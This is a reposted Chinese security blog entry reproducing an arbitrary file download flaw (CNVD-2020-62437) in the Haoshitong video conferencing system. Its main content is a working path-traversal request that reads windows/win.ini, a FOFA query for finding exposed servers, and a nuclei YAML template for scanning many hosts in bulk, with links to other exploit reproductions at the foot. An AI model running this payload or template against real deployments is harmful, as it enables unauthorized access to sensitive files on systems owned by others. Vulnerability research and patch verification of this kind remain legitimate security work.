首页 > 其他分享 >银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437

银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437

时间:2023-09-02 14:22:35浏览次数:48  
标签:E8% .. CNVD 好视通 AE% 银澎云 E4% BB%

漏洞描述

银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息

漏洞复现

fofa语法:app="好视通-视频会议"
登录页面如下:

POC:https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

nuclei批量yaml文件

id: haoshitong_fileread
info:
  name: 好视通视频会议系统 任意文件下载 CNVD-2020-62437
  author: mhb17
  severity: high
  description: description
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E9%93%B6%E6%BE%8E%E4%BA%91%E8%AE%A1%E7%AE%97/%E9%93%B6%E6%BE%8E%E4%BA%91%E8%AE%A1%E7%AE%97%20%E5%A5%BD%E8%A7%86%E9%80%9A%E8%A7%86%E9%A2%91%E4%BC%9A%E8%AE%AE%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%20CNVD-2020-62437.html
  tags: tags
requests:
  - raw:
      - |+
        GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - for 16-bit app support
      - type: word
        part: header
        words:
          - '200'

标签:E8%,..,CNVD,好视通,AE%,银澎云,E4%,BB%
From: https://www.cnblogs.com/pursue-security/p/17673636.html

相关文章

  • 【漏洞复现】用友NC uapjs RCE漏洞(CNVD-C-2023-76801)
    产品介绍    用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。漏洞概述     用友NC及NCCloud系统存在任意文件上......
  • 向日葵RCE复现CNVD-2022-10270/CNVD-2022-03672
    前言向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。于2022年2月5日和2022年2月15日,CNVD公开上海......
  • vulfocus redis 未授权访问 (CNVD-2015-07557)
    一、简介1.Redis是一套开源的使用ANSIC编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。2.Redis默认端口:6379,如果在没有开启认证的......
  • fastjson反序列化CNVD-2019-22238
    漏洞原理:fastjson是阿里的开源json解析库,用来将json字符串反序列化为JavaBean类,或者将JavaBean类序列化为json字符串。在java审计中,需要关注的关键字:JSON.parse,......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99